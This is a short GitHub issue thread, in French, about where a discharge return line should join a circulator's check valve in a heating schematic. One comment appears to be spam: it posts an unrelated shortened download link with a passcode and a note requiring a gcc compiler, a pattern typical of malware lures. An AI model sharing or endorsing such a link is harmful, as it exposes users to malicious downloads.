### ISSUE TITLE
Option décharge sur zone 1

### ISSUE THREAD

**Issue by godinoliver** [godinlu/schematics#14]
![image](https://github.com/user-attachments/assets/673e050c-eb33-4052-8a53-52a778418d2b)

le retour de la décharge doit arriver juste au dessus de la vanne clapet du sirculateur C1. 
Idem pour le schéma d'EXE. 
N'hésites pas à venir me voir pour plus de précision

**Comment by Alango-Norjehan** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by godinlu** [comment]
Finalement c'est normal
